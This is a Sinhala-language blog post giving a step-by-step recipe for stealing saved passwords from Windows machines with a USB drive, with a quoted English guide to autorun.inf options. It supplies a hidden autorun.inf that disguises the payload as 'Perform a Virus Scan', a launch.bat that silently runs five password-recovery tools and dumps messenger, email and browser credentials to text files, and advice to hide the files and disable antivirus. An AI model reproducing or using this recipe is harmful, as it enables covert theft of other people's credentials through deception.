USB Drive එකක් හරහා මුරපද හොරකම් කිරිම.

USB Drive එකක් හරහා මුරපද හොරකම් කිරිම.

අප්පේ මට යාලුවන්ගෙන් බැනුම් ගොඩයි , මොකද දන්නවද??? , hacking ගැන පොස්ට් මුකුත් දාන්නේ නෑ කියලා , ඒක නිසාම පරන මගේ බ්ලොග් එකේ දාපු නැති hacking වැඩ කෑලි ටිකක් දාන්න හිතුනා , අනේ සමාව ඉල්ලනවා ඔයාලගෙන් hacking ගැන මට මුකුත් පොස්ට් එකක් දාන්න බැරිවුනාට . වැඩි කතා ඕනේ නෑ , වැඩේට බහිමුකෝ !!!

මම මුලින්ම කියන්නම් කො මෙතැන අපි මොකක්ද කරන්නේ කියලා . ඔයොගොල්ලන් දන්නවා ඇතිනේ ජනේලය (windows) වල බොහෝ මුරපද (messengers වල , e-mail clients ලගේ , වෙබ් බ්‍රව්සර් වල ..... ) ගබඩා කරගෙන ඉන්නවා කියලා , ඉතින් අපි මෙතැනදි කරන්නේ  අර ගබඩා කරගෙන ඉන්න මුරපද ටික rootkit එකක් හදලා හොරකම් කිරිම (වැඩේ මරු නේ).

ඉස්සෙල්ලාම පොඩි මෘදුකාංග කිහිපයක් භාගත කරගන්න ඕනේ මේ සදහා  (මෘදුකාංග භාවිතා කිරිමේදි පොඩි අවුලක් එන්න පුලුවන් , මොකක්ද දන්නවද ? මේ වැඩ කෑල්ල ටිකක් පරන නිසා මේ සදහා මම පාවිච්චි කරන්න දාන මෘදුකාංග ටික  virus හෝ hacking tools  කියලා (මේවා virus වලින් පිරිච්ච මෘදුකාංග නෙවෙයි) virus guard වලින්  අල්ලන්න පුලුවන්  (බොහෝ විට) . එතකොට කරන වැඩේ බකල් වෙනවා නේ , අනික වෙලාවම හම්බවුනාම මම updated  මෘදුකාංග ටිකක් දාන්නම්කෝ . මේක හදිස්සියේ ලියන නිසා  updated  මෘදුකාංග ටිකක් හොයාගන්න අමාරු උනා (අනේ , ඉතින් මේකට මාත් එක්ක තරහා වෙන්න එපා හොදේ !!! ) )

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 

ආ , අනික් කාරණය තමා මේක කිරිම සදහා පමණක් virus guard එක diable කිරිම වඩා සුදුසුයි .

1. පලමුව භාගත කරගත්ත මෘදුකාංග කිහිපයේ executables (.exe files) ටික " pass" කියලා folder එකක් USB Drive එකේ හදලා , ඒකට executables (.exe files) ටික කොපි කරගන්න ( mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe ටික ).ඊට පස්සේ folder එකේ properties ගිහිල්ලා folder එක hide  කරන්න .

2. ඊලගට Notepad එක විවෘත කරලා , පහත කේතය ඒකට කොපි කරලා ඒක autorun.inf කියලා save කරන්න . ඊලගට ඒක USB Drive එකට කොපි කරලා file  එකේ properties ගිහිල්ලා file එක hide  කරන්න .

[autorun]
open=launch.bat

action= Perform a Virus Scan

explore=launch.bat 

useautoplay=1

* මෙතැන useautoplay=1  දාලා තියන එකෙන් කරන්නේ Autoplay හි පලමු ස්ථානයට අපේ action එක ගෙන ඒම . අනික් එවා ගැන දැනගැනිමට පහත විස්තරය බලන්න .

==========================================================================
Autorun.inf file එක ගැන වැඩි ඇම්මක් ඇති අයට....... (මේ පොස්ට් එක හදිස්සියේ ලියන නිසා English පොස්ට් එක සිංහලට හරවලා ලියන්න වෙලා මදි නිසා එහෙම්ම දැම්මා , පස්සේ දවසක මේක ගැන වැඩිපුර විස්තර කරලා පොස්ට් එකක් දාන්නම්කෝ).

Autorun.inf Structure

The autorun.inf file is a simple text file that can be opened up in any text editor (e.g. notepad). It always starts with a section header of:
[autorun]
Below this header is a list of different options. Each of these options is in the following format:
option=value
where
option is the option that you want to set and value is the value that you are setting for that option. So, if you had an option foo and you wanted to be set to bar, then you would enter:
foo=bar
(Do not use foo=bar in your autorun.inf file as it is only an example, not a real option setting.)
That is all there really is to understand about the structure of an autorun.inf file. On to doing some actual cool stuff with it!

Setting a Custom Icon

To create a custom icon for your USB drive, use the icon option. Set it to the name of the icon file.

Note: Since drive letters can change for USB drives, the file path is relative to the root of the drive. This means that if your USB drive is presently mounted on U: and your icon is located at U:\Icons\MyIcon.ico, then you would enter \Icons\MyIcon.ico for the value of this option.

For example, if you had an icon on the root of the USB drive called coffeecup.ico and you wanted this to be the icon that showed up for the USB drive, you would enter:
icon=coffeecup.ico
You are not limited to .ico files. If, for example, you have an executable with a nice icon, you can specify it as the icon file. For example:
icon=DCoTopen.exe
This is valid as long as DCoTopen.exe is available on the root of the USB drive.
Some files have more than one icon embedded in them. If this is the case, you can select which icon to use by specifing the index number after the file name. For example:
icon=iconlib.dll,2
This will use the second icon in the iconlib.dll file.

Naming Your USB Drive

If you would like your USB drive to display a specific name othr than the drive label created when it is formatted, use the label option. For example, if I wanted to call my drive DCoT Drive, I would add this to my autorun.inf file:
label=DCoT Drive
Now, when you look at your USB drive in My Computer, it will say DCoT Drive by the drive letter.

Setting AutoPlay Options

AutoPlay is a relatively new function of Windows XP. It allows you to set up what file is run when the USB drive is plugged into the computer and the message that you are prompted with. There are two options that work in conjunction with AutoPlay. The first is open. It specifies the program that you can run automatically with AutoPlay. So, if we wanted to run a program called DCoTopen.exe, you would add the this to your autorun.inf file:
open=DCoTopen.exe
The second option that we add is the message the user is prompted with. To set this, we use the action option. If we want the message to say DCoT Open Program, add the following to autorun.inf:
action=DCoT Open Program
Once you have added this information, AutoPlay should look something like this:

Adding Context Menu Items

There are certain basic options such as Open and Explore that are available when you right click on a USB drive. But, wouldn’t it be cool to add your own? You can using a couple of lines in the autorun.inf file.
The first thing that we need to do is create an action, give it a name, and a message. We do all of this using the shell\verb option. For example, let’s say that we would like to create an action called lost. It does not matter what the actin is called. It can be anything you want. We would also like to show the message Help! I’m Lost! in the context menu. We would simply add this line to autorun.inf:
shell\lost=Help! I'm Lost!
This will display Help! I’m Lost! in the context menu so that you can click on it. But, it doesn’t know what to do when you click on it. Tell the system by using shell\verb\command option. In our example, we want to run the Lost.exe application. Adding this line will do the trick:
shell\lost\command=Lost.exe
You can add as many of these line pairs as you want to make the context menu as custom as you want.

Changing Default Action

When you double click on your USB drive, by default it will open up the drive so that you can browse through the files. Often, it is advantageous to perform some other action when the user double clicks the USB drive icon. You do this with the shell option. If we wanted to run the Lost.exe program from the previous section automatically when we double clicked on the USB drive, we would add this line:
shell=lost
because lost is the name of the action that was specified in the earlier lines.

Viewing a File

If you wanted to view a file on your USB drive in the default application instead of running a program on the drive, you can substitute the open option for the shellexecute option. For example, if you wanted to open up a website called, oh, I don’t know, say http://www.DailyCupOfTech.com in the default web browser, you could user the following:
shellexecute=http://www.DailyCupOfTech.com
This will work for any file. This is the equivalent of using Start - Run… and then typing in a file name and clicking OK.

                                       - උපුටා ගැනිම http://dailycupoftech.com/usb-drive-autoruninf-tweaking/ වෙතිනි -
==========================================================================

3. ඊලගට තවත් Notepad එකක් විවෘත කරලා පහත කේතය ඒකට කොපි කරලා ඒක launch.bat කියලා save කරන්න . ඊලගට files ටික USB Drive එකට කොපි කරලා files  ටිකේ properties ගිහිල්ලා files ටික hide  කරන්න .

start pass\mspass.exe /stext mspass.txt
start pass\mailpv.exe /stext mailpv.txt
start pass\iepv.exe /stext iepv.txt
start pass\pspv.exe /stext pspv.txt
start pass\passwordfox.exe /stext passwordfox.txt

 *මෙම කේතයෙන් කරන්නේ අපේ මෘදුකාංග කිහිපයේ executables files ටික run කරලා , ඒවා මගින් ලැබෙන ප්‍රතිඵලය text files වල  save කරනවා (data dump කිරිල්ලක්). save text files ටික තියන්නේ "pass" folder එක ඇතුලේ .

දැන් ඉතින් අපි rootkit එක හදලා  ඉවරයි. දැන් තියන්නේ මේක test කරන්න . 


පලමුව මේක usb එකට ගහන්න , ඊලගට popup menu (autoplay) එක එයි , ඊලගට එහි
Perform a Virus Scan (අපි 2 වන පියවරේදි action එකට දුන්න එක ) Click කරන්න. දැන් ඔක්කොම  අපේ මෘදුකාංග කිහිපයේ executables files ටික run වෙලා ජනේලයේ (windows වල) ගබඩාකරගෙන තිබෙන මුරපද සියල්ල text files (.txt) වල හෙමිට silent එකේ save කරගනියි (මේකට වැඩිම වුනොත් තත්පර 2 හොඉ3 ක් යයි). ඊලගට usb එක ගලවලා ආයේ දාලා බලන්නකෝ , මුරපද ටික අර text (.txt ) file වල save වෙලා ඇති .

මේක  Windows 2000, XP and Vista වල එලට වැඩ කරනවා . මතක තියාගන්න මේ trick එක හරි යන්නේ ජනේලයේ (windows)  මුරපදගබඩා කරගෙන තිබුනොත් පමණයි .